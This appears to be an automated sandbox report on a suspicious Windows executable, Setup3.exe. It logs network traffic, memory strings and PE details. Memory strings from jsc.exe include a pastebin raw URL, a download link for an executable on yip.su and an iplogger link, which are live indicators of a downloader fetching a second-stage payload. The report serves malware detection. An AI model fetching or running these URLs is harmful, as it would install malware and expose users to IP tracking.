                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:11:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:11:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:11:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:11:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:11:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:11:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:11:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 17 Aug 2024 22:12:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
                Source: Setup3.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                Source: Setup3.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                Source: Setup3.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                Source: Setup3.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                Source: Setup3.exeString found in binary or memory: http://ocsp.sectigo.com0
                Source: jsc.exe, 00000008.00000002.4477652270.0000000002791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
                Source: jsc.exe, 00000008.00000002.4477652270.0000000002969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yip.su
                Source: jsc.exe, 00000008.00000002.4477652270.0000000002791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.com/1djqU4
                Source: jsc.exe, 00000008.00000002.4477652270.00000000028AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.comh
                Source: jsc.exe, 00000008.00000002.4477652270.00000000028AB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000008.00000002.4477652270.000000000285C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                Source: jsc.exe, 00000008.00000002.4477652270.0000000002791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/V6VJsrV3
                Source: Setup3.exe, 00000000.00000002.2234066396.000001AAD4C3E000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000008.00000002.4476131573.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4
                Source: jsc.exe, 00000008.00000002.4477652270.00000000028AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com4h
                Source: jsc.exe, 00000008.00000002.4477652270.00000000028AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.comh
                Source: Setup3.exeString found in binary or memory: https://sectigo.com/CPS0
                Source: jsc.exe, 00000008.00000002.4477652270.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000008.00000002.4477652270.000000000285C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                Source: jsc.exe, 00000008.00000002.4477652270.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000008.00000002.4477652270.000000000285C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                Source: jsc.exe, 00000008.00000002.4477652270.0000000002969000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000008.00000002.4477652270.00000000028AB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000008.00000002.4477652270.000000000285C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.su
                Source: jsc.exe, 00000008.00000002.4477652270.0000000002791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.su/RNWPd.exe
                Source: jsc.exe, 00000008.00000002.4477652270.000000000285C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.suh
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.5:49766 version: TLS 1.2
                Source: C:\Users\user\Desktop\Setup3.exeCode function: 0_2_00007FF848F20A050_2_00007FF848F20A05
                Source: C:\Users\user\Desktop\Setup3.exeCode function: 0_2_00007FF848F3643B0_2_00007FF848F3643B
                Source: C:\Users\user\Desktop\Setup3.exeCode function: 0_2_00007FF848F2D4B90_2_00007FF848F2D4B9
                Source: C:\Users\user\Desktop\Setup3.exeCode function: 0_2_00007FF848F2A3E80_2_00007FF848F2A3E8
                Source: C:\Users\user\Desktop\Setup3.exeCode function: 0_2_00007FF848F25E7B0_2_00007FF848F25E7B
                Source: C:\Users\user\Desktop\Setup3.exeCode function: 0_2_00007FF848F211FA0_2_00007FF848F211FA
                Source: C:\Users\user\Desktop\Setup3.exeCode function: 0_2_00007FF848F2FDE50_2_00007FF848F2FDE5
                Source: C:\Users\user\Desktop\Setup3.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2792 -s 1104
                Source: Setup3.exeStatic PE information: invalid certificate
                Source: Setup3.exeStatic PE information: No import functions for PE file found
                Source: Setup3.exe, 00000000.00000000.2015575717.000001AAD2D62000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHolyaya.exe0 vs Setup3.exe
                Source: Setup3.exe, 00000000.00000002.2234066396.000001AAD4C3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNew.exe" vs Setup3.exe
                Source: Setup3.exe, 00000000.00000002.2235573603.000001AAE4E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIxajujamuyadutuyejH vs Setup3.exe
